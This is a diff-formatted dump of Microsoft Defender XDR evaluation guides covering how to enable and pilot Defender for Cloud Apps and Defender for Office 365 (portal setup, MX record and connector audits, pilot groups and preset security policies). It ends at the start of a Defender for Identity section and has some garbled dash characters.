-Additionally, Microsoft Sentinel includes a Microsoft Defender for Cloud Apps connector to provide deeper integration with Microsoft Sentinel. This arrangement enables you to not only gain visibility into your cloud apps but to also get sophisticated analytics to identify and combat cyberthreats and to control how your data travels.
--- [Generic SIEM integration](/cloud-app-security/siem)-- [Stream alerts and Cloud Discovery logs from Defender for Cloud Apps into Microsoft Sentinel](/azure/sentinel/connect-cloud-app-security)-
-### Next steps
-
-Step 2 of 3: [Enable the evaluation environment for Microsoft Defender for Cloud Apps](eval-defender-mcas-enable-eval.md)
-
-Return to the overview for [Evaluate Microsoft Defender for Cloud Apps](eval-defender-mcas-overview.md)
-
-Return to the overview for [Evaluate and pilot Microsoft Defender XDR](eval-overview.md)
security Eval Defender Mcas Enable Eval https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-mcas-enable-eval.md
- Title: Enable the evaluation environment for Microsoft Defender for Cloud Apps
-description: Learn the architecture of Defender for Cloud Apps within Microsoft Defender for Office 365 and understand interactions between the Microsoft Defender XDR products.
-
- - NOCSH
----
- - m365-security
- - m365solution-scenario
- - m365solution-evalutatemtp
- - zerotrust-solution
- - highpri
- - tier1
- Previously updated : 05/14/2021--
-# Enable the evaluation environment for Microsoft Defender for Cloud Apps
-
-**Applies to:**
--- Microsoft Defender XDR-
-This article is [Step 2 of 2](eval-defender-mcas-overview.md) in the process of setting up the evaluation environment for Microsoft Defender for Cloud Apps. For more information about this process, see the [overview article](eval-defender-mcas-overview.md).
-
-This article walks you through the process of accessing the Defender for Cloud Apps portal and configuring the necessary integration to collect cloud app traffic data.
-
-To discover cloud apps used in your environment, you can implement one or both of the following methods:
--- Get up and running quickly with Cloud Discovery by integrating with Microsoft Defender for Endpoint. This native integration enables you to immediately start collecting data on cloud traffic across your Windows 10 and Windows 11 devices, on and off your network.-- To discover all cloud apps accessed by all devices connected to your network, deploy the Defender for Cloud Apps log collector on your firewalls and other proxies. This deployment helps collect data from your endpoints and sends it to Defender for Cloud Apps for analysis. Defender for Cloud Apps natively integrates with some third-party proxies for even more capabilities.-
-This article includes guidance for both methods.
-
-Use the following steps to set up Microsoft Defender for Cloud Apps.
---- [Step 1. Connect to the Defender for Cloud Apps portal](#step-1)-- [Step 2. Integrate with Microsoft Defender for Endpoint](#step-2)-- [Step 3. Deploy the Defender for Cloud Apps log collector on your firewalls and other proxies](#step-3)-- [Step 4. View the Cloud Discovery dashboard to see what apps are being used in your organization](#step-4)-
-<a name="step-1"></a>
-
-## Step 1: Connect to the Defender for Cloud Apps portal
-
-To verify licensing and to connect to the Defender for Cloud Apps portal, see [Quickstart: Get started with Microsoft Defender for Cloud Apps](/cloud-app-security/getting-started-with-cloud-app-security).
-
-If you're not immediately able to connect to the portal, you might need to add the IP address to the allowlist of your firewall. See [Basic setup for Defender for Cloud Apps](/cloud-app-security/general-setup).
-
-If you're still having trouble, review [Network requirements](/cloud-app-security/network-requirements).
-
-<a name="step-2"></a>
-
-## Step 2: Integrate with Microsoft Defender for Endpoint
-
-Microsoft Defender for Cloud Apps integrates with Microsoft Defender for Endpoint natively. The integration simplifies roll out of Cloud Discovery, extends Cloud Discovery capabilities beyond your corporate network, and enables device-based investigation. This integration reveals cloud apps and services being accessed from IT-managed Windows 10 and Windows 11 devices.
-
-If you've already set up Microsoft Defender for Endpoint, configuring integration with Defender for Cloud Apps is a toggle in Microsoft Defender XDR. After integration is turned on, you can return to the Defender for Cloud Apps portal and view rich data in the Cloud Discovery Dashboard.
-
-To accomplish these tasks, see [Microsoft Defender for Endpoint integration with Microsoft Defender for Cloud Apps](/cloud-app-security/mde-integration).
-
-<a name="step-3"></a>
-
-## Step 3: Deploy the Defender for Cloud Apps log collector on your firewalls and other proxies
-
-For coverage on all devices connected to your network, deploy the Defender for Cloud Apps log collector on your firewalls and other proxies to collect data from your endpoints and send it to Defender for Cloud Apps for analysis.
-
-If you're using one of the following Secure Web Gateways (SWG), Defender for Cloud Apps provides seamless deployment and integration:
--- Zscaler-- iboss-- Corrata-- Menlo Security-
-For more information on integrating with these network devices, see [Set up Cloud Discovery](/cloud-app-security/set-up-cloud-discovery).
-
-<a name="step-4"></a>
-
-## Step 4: View the Cloud Discovery dashboard to see what apps are being used in your organization
-
-The Cloud Discovery dashboard is designed to give you more insight into how cloud apps are being used in your organization. It provides an at-a-glance overview of what kinds of apps are being used, your open alerts, and the risk levels of apps in your organization.
-
-To get started using the Cloud Discovery dashboard, see [Working with discovered apps](/cloud-app-security/discovered-apps).
-
-## Next steps
-
-Step 3 of 3: [Pilot Microsoft Defender for Cloud Apps](eval-defender-mcas-pilot.md)
-
-Return to the overview for [Evaluate Microsoft Defender for Cloud Apps](eval-defender-mcas-overview.md)
-
-Return to the overview for [Evaluate and pilot Microsoft Defender XDR](eval-overview.md)
security Eval Defender Mcas Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-mcas-overview.md
- Title: Step 5. Evaluate Microsoft Defender for Cloud Apps overview
-description: Steps to set up your Microsoft Defender XDR trial lab or pilot environment to try out and experience the security solution designed to protect devices, identity, data, and applications in your organization.
-
- - NOCSH
-- Previously updated : 07/09/2021--
- - m365-security
- - m365solution-scenario
- - m365solution-evalutatemtp
- - zerotrust-solution
- - highpri
- - tier1
---
-# Step 5. Evaluate Microsoft Defender for Cloud Apps
-
-**Applies to:**
-- Microsoft Defender XDR-
-This article outlines the process to enable and pilot Microsoft Defender for Cloud Apps alongside Microsoft Defender XDR. Before starting this process, be sure you've reviewed the overall process for [evaluating Microsoft Defender XDR](eval-overview.md) and you have [created the Microsoft Defender XDR evaluation environment](eval-create-eval-environment.md).
-
-Use the following steps to enable and pilot Microsoft Defender for Cloud Apps.
--
-|Step |Description |
-|||
-|[Review architecture requirements and key concepts](eval-defender-mcas-architecture.md) | Understand the Defender for Cloud Apps architecture and how it integrates with Microsoft Defender XDR, Microsoft Defender for Endpoint, and Microsoft Entra ID. |
-|[Enable the evaluation environment](eval-defender-mcas-enable-eval.md) | Connect to the portal, configure integration with Defender for Identity and/or your organization's network devices, and begin to view and manage cloud apps. |
-|[Set up the pilot](eval-defender-mcas-pilot.md) | Scope your deployment to certain user groups, configure Conditional Access App Control, and try out tutorials for protecting your environment. |
security Eval Defender Mcas Pilot https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-mcas-pilot.md
- Title: Pilot Microsoft Defender for Cloud Apps with Microsoft Defender XDR
-description: Set up your Microsoft Defender XDR trial lab or pilot environment to test and experience the security solution designed to protect devices, identity, data, and applications.
-
- - NOCSH
-- Previously updated : 07/09/2021--
- - m365-security
- - m365solution-scenario
- - m365solution-evalutatemtp
- - zerotrust-solution
- - highpri
- - tier1
---
-# Pilot Microsoft Defender for Cloud Apps with Microsoft Defender XDR
--
-**Applies to:**
-- Microsoft Defender XDR-
-This article is [Step 3 of 3](eval-defender-mcas-overview.md) in the process of setting up the evaluation environment for Microsoft Defender for Cloud Apps. For more information about this process, see the [overview article](eval-defender-mcas-overview.md).
-
-Use the following steps to set up and configure the pilot for Microsoft Defender for Cloud Apps.
---- [Step 1. Create the pilot groupΓÇöScope your pilot deployment to certain user groups](#step-1-create-the-pilot-groupscope-your-pilot-deployment-to-certain-user-groups)-- [Step 2. Configure protectionΓÇöConditional Access App Control](#step-2-configure-protectionconditional-access-app-control)-- [Step 3. Try out capabilitiesΓÇöWalk through tutorials for protecting your environment](#step-3-try-out-capabilitieswalk-through-tutorials-for-protecting-your-environment) -
-## Step 1: Create the pilot groupΓÇöScope your pilot deployment to certain user groups
-
-Microsoft Defender for Cloud Apps enables you to scope your deployment. Scoping allows you to select certain user groups to be monitored for apps or excluded from monitoring. You can include or exclude user groups. To scope your pilot deployment, see [Scoped Deployment](/cloud-app-security/scoped-deployment).
--
-## Step 2: Configure protectionΓÇöConditional Access App Control
-
-One of the most powerful protections you can configure is Conditional Access App Control. This protection requires integration with Microsoft Entra ID. It allows you to apply Conditional Access policies, including related policies (like requiring healthy devices), to cloud apps you've sanctioned.
-
-The first step in using Microsoft Defender for Cloud Apps to manage SaaS apps is to discover these apps and then add them to your Microsoft Entra tenant. If you need help with discovery, see [Discover and manage SaaS apps in your network](/cloud-app-security/tutorial-shadow-it). After you've discovered apps, [add these apps to your Microsoft Entra tenant](/azure/active-directory/manage-apps/add-application-portal).
-
-You can begin to manage these apps by executing the following tasks:
--- First, in Microsoft Entra ID, create a new conditional access policy and configure it to "Use Conditional Access App Control." This configuration helps to redirect the request to Defender for Cloud Apps. You can create one policy and add all SaaS apps to this policy.-- Next, in Defender for Cloud Apps, create session policies. Create one policy for each control you want to apply.-
-For more information, including supported apps and clients, see [Protect apps with Microsoft Defender for Cloud Apps Conditional Access App Control](/cloud-app-security/proxy-intro-aad).
-
-For example policies, see [Recommended Microsoft Defender for Cloud Apps policies for SaaS apps](../office-365-security/zero-trust-identity-device-access-policies-mcas-saas.md). These policies build on a set of [common identity and device access policies](../office-365-security/zero-trust-identity-device-access-policies-overview.md) that are recommended as a starting point for all customers.
-
-## Step 3: Try out capabilitiesΓÇöWalk through tutorials for protecting your environment
-
-The Microsoft Defender for Cloud Apps documentation includes a series of tutorials to help you discover risk and protect your environment.
-
-Try out Defender for Cloud Apps tutorials:
--- [Detect suspicious user activity](/cloud-app-security/tutorial-suspicious-activity)-- [Investigate risky users](/cloud-app-security/tutorial-ueba)-- [Investigate risky OAuth apps](/cloud-app-security/investigate-risky-oauth)-- [Discover and protect sensitive information](/cloud-app-security/tutorial-dlp)-- [Protect any app in your organization in real time](/cloud-app-security/tutorial-proxy)-- [Block downloads of sensitive information](/cloud-app-security/use-case-proxy-block-session-aad)-- [Protect your files with admin quarantine](/cloud-app-security/use-case-admin-quarantine)-- [Require step-up authentication upon risky action](/cloud-app-security/tutorial-step-up-authentication)-
-For more information on advanced hunting in Microsoft Defender for Cloud Apps data, see the [video](https://www.microsoft.com/en-us/videoplayer/embed/RWFISa).
-
-## Next steps
-
-[Investigate and respond using Microsoft Defender XDR in a pilot environment](eval-defender-investigate-respond.md)
-
-Return to the overview for [Evaluate Microsoft Defender for Cloud Apps](eval-defender-mcas-overview.md)
-
-Return to the overview for [Evaluate and pilot Microsoft Defender XDR](eval-overview.md)
security Eval Defender Office 365 Architecture https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-office-365-architecture.md
- Title: Review architecture requirements and planning concepts for Microsoft Defender for Office 365
-description: The technical diagram for Microsoft Defender for Office 365 in Microsoft Defender XDR will help you understand identity at Microsoft 365 before you build your trial lab or pilot environment.
-
- - NOCSH
-- Previously updated : 07/01/2021--
- - m365-security
- - m365solution-scenario
- - m365solution-evalutatemtp
- - zerotrust-solution
- - highpri
- - tier1
---
-# Review Microsoft Defender for Office 365 architecture requirements and key concepts
-
-**Applies to:**
-- Microsoft Defender XDR-
-This article is [Step 1 of 3](eval-defender-office-365-overview.md) in the process of setting up the evaluation environment for Microsoft Defender for Office 365. For more information about this process, see the [overview article](eval-defender-office-365-overview.md).
-
-Before enabling Defender for Office 365, be sure you understand the architecture and can meet the requirements. This article describes the architecture, key concepts, and the prerequisites that your Exchange Online environment must meet.
-
-## Understand the architecture
-
-The following diagram illustrates baseline architecture for Microsoft Defender for Office, which can include a third-party SMTP gateway or on-premises integration. Hybrid coexistence scenarios (that is, production mailboxes are both on-premise and online) require more complex configurations and are not covered in this article or evaluation guidance.
--
-The following table describes this illustration.
-
-|Call-out|Description|
-|||
-|1|The host server for the external sender typically performs a public DNS lookup for an MX record, which provides the target server to relay the message. This referral can either be Exchange Online (EXO) directly or an SMTP gateway that has been configured to relay against EXO.|
-|2|Exchange Online Protection negotiates and validates the inbound connection and inspects the message headers and content to determine what extra policies, tagging, or processing is required.|
-|3|Exchange Online integrates with Microsoft Defender for Office 365 to offer more advanced threat protection, mitigation, and remediation.|
-|4|A message that is not malicious, blocked, or quarantined is processed and delivered to the recipient in EXO where user preferences related to junk mail, mailbox rules, or other settings are evaluated and triggered.|
-|5|Integration with on-premises Active Directory can be enabled using Microsoft Entra Connect to synchronize and provision mail-enabled objects and accounts to Microsoft Entra ID and ultimately Exchange Online.|
-|6|When integrating an on-premises environment, it is encouraged to use an Exchange server for supported management and administration of mail-related attributes, settings, and configurations|
-|7|Microsoft Defender for Office 365 shares signals to Microsoft Defender XDR for extended detection and response (XDR).|
-
-On-premises integration is common but optional. If your environment is cloud-only, this guidance will also work for you.
-
-## Understand key concepts
-
-The following table identified key concepts that are important to understand when evaluating, configuring, and deploying Defender for Office 365.
-
-|Concept|Description|More information|
-||||
-|Exchange Online Protection|Exchange Online Protection (EOP) is the cloud-based filtering service that helps protect your organization against spam and malware in email. EOP is included in all Microsoft 365 licenses that include Exchange Online.|[Exchange Online Protection overview](../office-365-security/eop-about.md)|
-|Anti-malware protection|Organizations with mailboxes in Exchange Online are automatically protected against malware.|[Anti-malware protection in EOP](../office-365-security/anti-malware-protection-about.md)|
-|Anti-spam protection|Organizations with mailboxes in Exchange Online are automatically protected against junk mail and spam.|[Anti-spam protection in EOP](../office-365-security/anti-spam-protection-about.md)|
-|Anti-phishing protection|Defender for Office 365 offers more advanced anti-phishing protection related to spear phishing, whaling, ransomware, and other malicious activities.|[Extra anti-phishing protection in Microsoft Defender for Office 365](../office-365-security/anti-phishing-protection-about.md)|
-|Anti-spoofing protection|EOP includes features to help protect your organization from spoofed (forged) senders.|[Anti-spoofing protection in EOP](../office-365-security/anti-phishing-protection-spoofing-about.md)|
-|Safe Attachments|Safe Attachments provides an extra layer of protection by using a virtual environment to check and "detonate" attachments in email messages before they're delivered.|[Safe Attachments in Microsoft Defender for Office 365](../office-365-security/safe-attachments-about.md)|
-|Safe Attachments for SharePoint, OneDrive, and Microsoft Teams|In addition, Safe Attachments for SharePoint, OneDrive, and Microsoft Teams offers an extra layer of protection for files that have been uploaded to cloud storage repositories.|[Safe Attachments for SharePoint, OneDrive, and Microsoft Teams](../office-365-security/safe-attachments-for-spo-odfb-teams-about.md)|
-|Safe Links|Safe Links is a feature that provides URL scanning and rewriting within inbound email messages and offers verification of those links before they are delivered or clicked.|[Safe Links in Microsoft Defender for Office 365](../office-365-security/safe-links-about.md)|
-
-For more detailed information about the capabilities included with Microsoft Defender for Office, see [Microsoft Defender for Office 365 service description](/office365/servicedescriptions/office-365-advanced-threat-protection-service-description).
-
-## Review architecture requirements
-
-A successful Defender for Office 365 evaluation or production pilot assumes the following pre-requisites:
--- All your recipient mailboxes are currently in Exchange Online.-- Your public MX record resolves directly to EOP or a third-party SMTP gateway that then relays inbound external email directly to EOP.-- Your primary email domain is configured as *authoritative* in Exchange Online.-- You successfully deployed and configured *Directory-Based Edge Blocking* (DBEB) as appropriate. For more information, see [Use Directory-Based Edge Blocking to reject messages sent to invalid recipients](/exchange/mail-flow-best-practices/use-directory-based-edge-blocking).-
-> [!IMPORTANT]
-> If these requirements are not applicable or you are still in a hybrid coexistence scenario, then a Microsoft Defender for Office 365 evaluation can require more complex or advanced configurations which are not fully covered in this guidance.
-
-## SIEM integration
-
-You can integrate Microsoft Defender for Office 365 with Microsoft Sentinel to more comprehensively analyze security events across your organization and build playbooks for effective and immediate response. For more information, see [Connect alerts from Microsoft Defender for Office 365](/azure/sentinel/connect-office-365-advanced-threat-protection).
-
-Microsoft Defender for Office 365 can also be integrated into other Security Information and Event Management (SIEM) solutions using the [Office 365 Activity Management API](/office/office-365-management-api/office-365-management-activity-api-reference).
-
-## Next steps
-
-Step 2 of 3: [Enable the evaluation environment Microsoft Defender for Office 365](eval-defender-office-365-enable-eval.md)
-
-Return to the overview for [Evaluate Microsoft Defender for Office 365](eval-defender-office-365-overview.md)
-
-Return to the overview for [Evaluate and pilot Microsoft Defender XDR](eval-overview.md)
security Eval Defender Office 365 Enable Eval https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-office-365-enable-eval.md
- Title: Enable the evaluation environment for Microsoft Defender for Office 365 in your production environment
-description: Steps to activate Microsoft Defender for Office 365 evaluation, with trial licenses, MX record handling, & auditing of accepted domains and inbound connections.
-
- - NOCSH
-- Previously updated : 09/01/2021--
- - m365-security
- - m365solution-scenario
- - m365solution-evalutatemtp
- - zerotrust-solution
- - highpri
- - tier1
---
-# Enable the evaluation environment
-
-**Applies to:**
-- Microsoft Defender XDR-
-This article is [Step 2 of 3](eval-defender-office-365-overview.md) in the process of setting up the evaluation environment for Microsoft Defender for Office 365. For more information about this process, see the [overview article](eval-defender-office-365-overview.md).
-
-Use the following steps to enable the evaluation for Microsoft Defender for Office 365.
---- [Step 1: Audit and verify the public MX record](#step-1-audit-and-verify-the-public-mx-record)-- [Step 2: Audit accepted domains](#step-2-audit-accepted-domains)-- [Step 3: Audit inbound connectors](#step-3-audit-inbound-connectors)-- [Step 4: Activate the evaluation](#step-4-activate-the-evaluation)-
-## Step 1: Audit and verify the public MX record
-
-To effectively evaluate Microsoft Defender for Office 365, it's important that inbound external email is relayed through the Exchange Online Protection (EOP) instance associated with your tenant.
-
-1. In the M365 Admin Portal at <https://admin.microsoft.com>, expand *...Show all* if necessary, expand *Settings*, and then select **Domains**. Or, to go directly to the *Domains* page, use <https://admin.microsoft.com/Adminportal/Home#/Domains>.
-2. On the *Domains* page, select your verified email domain by clicking anywhere on the entry other than the check box.
-3. In the domain details flyout that opens, select the **DNS records** tab. Make note of the MX record that's generated and assigned to your EOP tenant.
-4. Access your external (public) DNS zone and check the primary MX record associated with your email domain:
- - *If your public MX record currently matches the assigned EOP address (for example, contoso-com.mail.protection.outlook.com) then no further routing changes should be required*.
- - If your public MX record currently resolves to a third-party or on-premises SMTP gateway, then additional routing configurations may be required.
- - If your public MX record currently resolves to on-premises Exchange, then you may still be in a hybrid model where some recipient mailboxes haven't yet been migrated to EXO.
-
-## Step 2: Audit accepted domains
-
-1. In the Exchange admin center (EAC) at <https://admin.exchange.microsoft.com>, expand *Mail flow*, and then click **Accepted domains**.Or, to go directly to the *Accepted domains* page, use <https://admin.exchange.microsoft.com/#/accepteddomains>.
-2. On the *Accepted domains* page, make note of the **Domain type** value for your primary email domain.
- - If the domain type is set to **Authoritative**, then it's assumed all recipient mailboxes for your organization currently reside in Exchange Online.
- - If the domain type is set to **InternalRelay**, then you may still be in a hybrid model where some recipient mailboxes still reside on-premises.
-
-## Step 3: Audit inbound connectors
-
-1. In the Exchange admin center (EAC) at <https://admin.exchange.microsoft.com>, expand *Mail flow*, and then click **Connectors**. Or, to go directly to the *Connectors* page, use <https://admin.exchange.microsoft.com/#/connectors>.
-2. On the *Connectors* page, make note of any connectors with the following settings:
- - The **From** value is **Partner org** that might correlate to a third-party SMTP gateway.
- - The **From** value is **Your org** that might indicate you're still in a hybrid scenario.
-
-## Step 4: Activate the evaluation
-
-Use the instructions here to activate your Microsoft Defender for Office 365 evaluation from the Microsoft Defender portal.
-
-For detailed information, see [Try Microsoft Defender for Office 365](../office-365-security/try-microsoft-defender-for-office-365.md).
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, expand *Email & collaboration* \> select **Policies & rules** \> select **Threat policies** \> scroll down to the *Others* section, and then select **Evaluation mode**. Or, to go directly to the *Evaluation mode* page, use <https://security.microsoft.com/atpEvaluation>.
-
-2. On the *Evaluation mode* page, click **Start evaluation**.
-
- :::image type="content" source="../../medio-eval-activate-eval_05.png":::
-
-3. In the *Turn on protection* dialog, select **No, I only want reporting**, and then click **Continue**.
-
- :::image type="content" source="../../medio-eval-activate-eval_06.png":::
-
-4. In the *Select the users you want to include* dialog, select **All users**, and then click **Continue**.
-
- :::image type="content" source="../../medio-eval-activate-eval_07.png":::
-
-5. In the *Help us understand your mail flow* dialog, one of the following options is automatically selected based on our detection of the MX record for your domain:
-
- - **I'm only using Microsoft Exchange Online**: The MX records for your domain point to Microsoft 365. There's nothing left to configure, so click **Finish**.
-
- :::image type="content" source="../../medio-eval-activate-eval_08a.png":::
-
- - **I'm using a third-party and/or on-premises service provider**: In the upcoming screens, select the vendor name along with the inbound connector that accepts mail from that solution. You also decide if you need an Exchange Online mail flow rule (also known as a transport rule) that skips spam filtering for incoming messages from the third-party protection service or device. When you're finished, click **Finish**.
-
-## Next steps
-
-Step 3 of 3: Set up the pilot for Microsoft Defender for Office 365
-
-Return to the overview for [Evaluate Microsoft Defender for Office 365](eval-defender-office-365-overview.md)
-
-Return to the overview for [Evaluate and pilot Microsoft Defender XDR](eval-overview.md)
security Eval Defender Office 365 Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-office-365-overview.md
- Title: Step 3. Evaluate Microsoft Defender for Office 365 overview
-description: Use this overview to learn the steps to set up an MDO pilot, including requirements, enabling or activating the eval, and setting up the pilot.
-
- - NOCSH
----
- - m365-security
- - m365solution-scenario
- - m365solution-evalutatemtp
- - zerotrust-solution
- - highpri
- - tier1
- Previously updated : 05/27/2021--
-# Step 3. Enable and pilot Microsoft Defender for Office 365
-
-**Applies to:**
-- Microsoft Defender XDR-
-This article outlines the process to enable and pilot Microsoft Defender for Office 365. Before starting this process, be sure you've reviewed the overall process for [evaluating Microsoft Defender XDR](eval-overview.md), and you've [created the Microsoft Defender XDR evaluation environment](eval-create-eval-environment.md).
-
-Use the following steps to enable and pilot Microsoft Defender for Office 365.
--
-The following table describes the steps in the illustration.
-
-|Step number|Link|Description|
-||||
-|1|[Review architecture requirements and key concepts](eval-defender-office-365-architecture.md)|Understand the Defender for Office architecture and be sure your Exchange Online environment meets the architecture prerequisites.|
-|2|[Enable the evaluation environment](eval-defender-office-365-enable-eval.md)|Follow the steps to set up the evaluation environment.|
-|3|[Set up the pilot](eval-defender-office-365-pilot.md)|Create pilot groups, configure protection, and become familiar with key features and dashboards.|
security Eval Defender Office 365 Pilot https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-office-365-pilot.md
- Title: Pilot Microsoft Defender for Office 365, use the evaluation in your production environment
-description: Steps to pilot your Evaluation with groups of active and existing users in order to properly test the features of Microsoft Defender for Office 365.
-
- - NOCSH
-- Previously updated : 9/18/2023--
- - m365-security
- - m365solution-scenario
- - m365solution-evalutatemtp
- - zerotrust-solution
- - highpri
- - tier1
----
-# Pilot Microsoft Defender for Office 365
-
-**Applies to:**
-- Microsoft Defender XDR-
-This article is [Step 3 of 3](eval-defender-office-365-overview.md) in the process of setting up the evaluation environment for Microsoft Defender for Office 365. For more information about this process, see the [overview article](eval-defender-office-365-overview.md).
-
-Use the following steps to set up and configure the pilot for Microsoft Defender for Office 365.
---- [Step 1: Create pilot groups](#step-1-create-pilot-groups)-- [Step 2: Configure protection](#step-2-configure-protection)-- [Step 3: Try out capabilities ΓÇö Get familiar with simulation, monitoring, and metrics](#step-3-try-out-capabilities-and-get-familiar-with-simulation-monitoring-and-metrics)-
-When you evaluate Microsoft Defender for Office 365, you might choose to pilot specific users before enabling and enforcing policies for your entire organization. Creating distribution groups can help manage the deployment processes. For example, create groups such as *Defender for Office 365 Users - Standard Protection*, *Defender for Office 365 Users - Strict Protection*, *Defender for Office 365 Users - Custom Protection*, or *Defender for Office 365 Users - Exceptions*.
-
-It might not be evident why 'Standard' and 'Strict' are the terms used for these groups, but that will become clear when you explore more about Defender for Office 365 security presets. Naming groups 'custom' and 'exceptions' speak for themselves, and though most of your users should fall under *standard* and *strict*, custom and exception groups will collect valuable data for you regarding managing risk.
-
-## Step 1: Create pilot groups
-
-Distribution groups can be created and defined directly in Exchange Online or synchronized from on-premises Active Directory.
-
-1. Sign in to the Exchange Admin Center (EAC) at <https://admin.exchange.microsoft.com> using an account that has been granted Recipient Administrator role or been delegated group management permissions.
-2. Go to **Recipients** \> **Groups**.
-
- :::image type="content" source="../../medio-eval-pilot.png":::
-
-3. On the **Groups** page, select ![Add a group icon.](../../media/m365-cc-sc-add-internal-icon.png) **Add a group**.
-
- :::image type="content" source="../../medio-eval-pilot-add-group.png":::
-
-4. For group type, select **Distribution**, and then click **Next**.
-
- :::image type="content" source="../../medio-eval-pilot-group-type.png":::
-
-5. Give the group a **Name** and optional **Description**, and then click Next.
-
- :::image type="content" source="../../medio-eval-pilot-set-up-basics.png":::
-
-6. On the remaining pages, assign an owner, add members to the group, set the email address, join-depart restrictions, and other settings.
-
-## Step 2: Configure protection
-
-Some capabilities in Defender for Office 365 are configured and turned on by default, but security operations might want to raise the level of protection from the default.
-
-Some capabilities are *not yet* configured. You have the following options for configuring protection (which are easy to change later):
--- **Assign users to preset security policies**: [Preset security policies](../office-365-security/preset-security-policies.md) are the recommended method to quickly assign a uniform level of protection across all of the capabilities. You can choose from **Standard** or **Strict** protection. The settings for Standard and Strict are described in the tables [here](../office-365-security/recommended-settings-for-eop-and-office365.md). The differences between Standard and Strict are summarized in the table [here](../office-365-security/preset-security-policies.md#policy-settings-in-preset-security-policies).-
- The advantages of preset security polices are you protect groups of users as quickly as possible using Microsoft's recommended settings based on observations in the datacenters. As new protection capabilities are added and as the security landscape changes, the settings in preset security policies are automatically updated to our recommended settings.
-
- The disadvantage of preset security policies is you can't customize virtually any of the security settings in preset security policies (for example, you can't change an action from deliver to junk to quarantine, or vice-versa). The exception is entries and optional exceptions for [user impersonation and domain impersonation protection](../office-365-security/anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365), which you must configure manually.
-
- Also, keep in mind that preset security policies are *always* applied before custom policies. So, if you want to create and use any custom policies, you'll need to exclude users in those custom policies from preset security policies.
--- **Configure *custom* protection policies**: If you prefer to configure the environment yourself, compare the default, Standard, and Strict settings in [Recommended settings for EOP and Microsoft Defender for Office 365 security](../office-365-security/recommended-settings-for-eop-and-office365.md). Keep a spreadsheet of where your custom build deviates.-
- You can also use the [Configuration analyzer](../office-365-security/configuration-analyzer-for-security-policies.md) to compare the settings in your custom policies to the Standard and Strict values.
-
-For detailed information about choosing preset security policies vs. custom policies, see [Determine your protection policy strategy](../office-365-security/mdo-deployment-guide.md#determine-your-protection-policy-strategy).
-
-### Assign preset security policies
-
-We recommended you begin with the *preset security policies* in EOP and Defender for Office 365 fast by assigning them to specific pilot users or defined groups as part of your evaluation. Preset policies offer a baseline **Standard** protection template or a more aggressive **Strict** protection template, which can be assigned independently.
-
-For example, an EOP condition for pilot evaluations could be applied if the recipients are *members* of a defined *EOP Standard Protection* group, and then managed by adding accounts to, or removing account from, the group.
-
-Likewise, a Defender for Office 365 condition for pilot evaluations could be applied if the recipients are *members* of a defined *Defender for Office 365 Standard Protection* group and then managed by adding / removing accounts via the group.
-
-For complete instructions, see [Use the Microsoft Defender portal to assign Standard and Strict preset security policies to users](../office-365-security/preset-security-policies.md#use-the-microsoft-defender-portal-to-assign-standard-and-strict-preset-security-policies-to-users).
-
-### Configure custom protection policies
-
-The pre-defined *Standard* or *Strict* Defender for Office 365 policy templates give your pilot users the recommended baseline protection. However, you can also build and assign custom protection policies as part of your evaluation.
-
-It's *important* to be aware of the precedence these protection policies take when applied and enforced, as explained in [Order of precedence for preset security policies and other policies](../office-365-security/preset-security-policies.md#order-of-precedence-for-preset-security-policies-and-other-policies).
-
-The explanation and table in [Configure protection policies](../office-365-security/mdo-deployment-guide.md#step-2-configure-protection-policies) provides a handy reference for what you need to configure.
-
-## Step 3: Try out capabilities and get familiar with simulation, monitoring, and metrics
-
-Now that your pilot is set up and configured, it's helpful to become familiar with the reporting, monitoring, and attack simulation tools that are unique to Microsoft Defender for Microsoft 365.
-
-|Capability|Description|More information|
-||||
-|Threat Explorer|Threat Explorer is a powerful near real-time tool to help Security Operations teams investigate and respond to threats and displays information about detected malware and phishing in email and files in Office 365, as well as other security threats and risks to your organization.|[About Threat Explorer](../office-365-security/threat-explorer-real-time-detections-about.md)|
-|Attack simulation training|You can use Attack simulation training in the Microsoft Defender portal to run realistic attack scenarios in your organization, which help you identify and find vulnerable users before a real attack impacts your environment.|[Get started using Attack simulation training](../office-365-security/attack-simulation-training-get-started.md)|
-|Reports dashboard|On the left navigation menu, click Reports and expand the Email & collaboration heading. The Email & collaboration reports are about spotting security trends some of which will allow you to take action (through buttons like 'Go to submissions'), and others that will show trends. These metrics are generated automatically.|[View email security reports in the Microsoft Defender portal](../office-365-security/reports-email-security.md) <br/><br/> [View Defender for Office 365 reports in the Microsoft Defender portal](../office-365-security/reports-defender-for-office-365.md)|
-
-## Next steps
-
-[Evaluate Microsoft Defender for Endpoint](eval-defender-endpoint-overview.md)
-
-Return to the overview for [Evaluate Microsoft Defender for Office 365](eval-defender-office-365-overview.md)
-
-Return to the overview for [Evaluate and pilot Microsoft Defender XDR](eval-overview.md)
-
security Eval Defender Promote To Production https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-promote-to-production.md
- Title: Step 7. Promote your Microsoft Defender XDR evaluation environment to Production
-description: Use this article to promote your trial subscriptions of Defender for Identity, Defender for Office 365, Defender for Endpoint, and Defender for Cloud Apps to your live environment in Microsoft Defender XDR.
---
- - NOCSH
--
- - m365-security
- - m365solution-scenario
- - m365solution-evalutatemtp
- - zerotrust-solution
- - highpri
- - tier1
- Previously updated : 05/13/2021--
-# Step 7. Promote your Microsoft Defender XDR evaluation environment to production
-
-**Applies to:**
-- Microsoft Defender XDR-
-To promote your Microsoft Defender XDR evaluation environment to production, first purchase the necessary license. Follow the steps in [Create the eval environment](eval-create-eval-environment.md) and purchase the Office 365 E5 license (instead of selecting Start free trial).
-
-Next, complete any other configuration and expand your pilot groups until these reach full production.
-
-## Microsoft Defender for Identity
-
